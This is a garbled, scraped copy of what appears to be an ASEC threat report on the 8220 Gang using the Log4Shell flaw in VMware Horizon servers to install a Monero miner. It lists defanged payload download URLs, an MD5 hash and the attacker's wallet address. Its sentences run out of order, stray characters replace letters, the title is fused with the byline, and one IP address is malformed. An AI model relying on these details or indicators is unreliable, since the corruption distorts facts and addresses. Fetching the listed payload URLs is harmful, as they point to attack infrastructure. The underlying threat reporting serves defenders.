![]() ![]() – hxxp:///deliver1.exe : ScrubCrypt for CoinMiner – hxxp:///bypass.ps1 : Log4Shell PowerShell Downloader – hxxp://163.123.142210/bypass.ps1 : Oracle Weblogic Exploit PowerShell Downloader – d63be89106d40f7b22e5c66de6ea5d65 : Oracle Weblogic Exploit PowerShell Downloader (bypass.ps1) Finally, caution must be practiced by updating V3 to the latest version to block malware infection in advance. They should also use security programs such as firewalls for servers accessible from outside to restrict access by attackers. Recently, it has been using the Log4Shell vulnerabilities in VMware Horizon servers.Īdministrators must check if their current VMware servers are susceptible and apply the latest patches to prevent vulnerability attacks. There have been cases where the group targeted vulnerable Atlassian Confluence servers. The attack group known as 8220 Gang installs XMRig CoinMiner to mine Monero coins in vulnerable systems that are not patched. The 8220 Gang attack group has consistently been using an identical wallet address. ![]() It is also identical to the recent Oracle Weblogic server vulnerability attack case posted by Fortinet. The attacker’s Monero wallet address is identical to the address in the previously revealed Atlassian Confluence server vulnerability attack. Wallet Address: “46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ”.ASEC has introduced a case where the attack group abused the Atlassian Confluence server vulnerability CVE-2022-26134 to attack Korean systems and install CoinMiner.įigure 14. The group targets not only global systems but also Korean ones. The group has a tendency to install CoinMiner if it finds vulnerable systems. Their activities have been observed since 2017. Log4Shell (CVE-2021-44228) is both a remote code execution vulnerability and the Java-based logging utility Log4j vulnerability that can remotely execute a Java object in servers that use Log4j by including the remote Java object address in the log message and sending it.Ĩ220 Gang is an attack group that targets vulnerable Windows / Linux systems. Among the systems targeted for the attack, there were Korean energy-related companies with unpatched and vulnerable systems, hence being preyed upon by multiple attackers. Posted By Sanseo, Ap8220 Gang Uses Log4Shell Vulnerability to Install CoinMinerĪhnlab Security Emergency response Center (ASEC) has recently confirmed that the 8220 Gang attack group is using the Log4Shell vulnerability to install CoinMiner in VMware Horizon servers. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |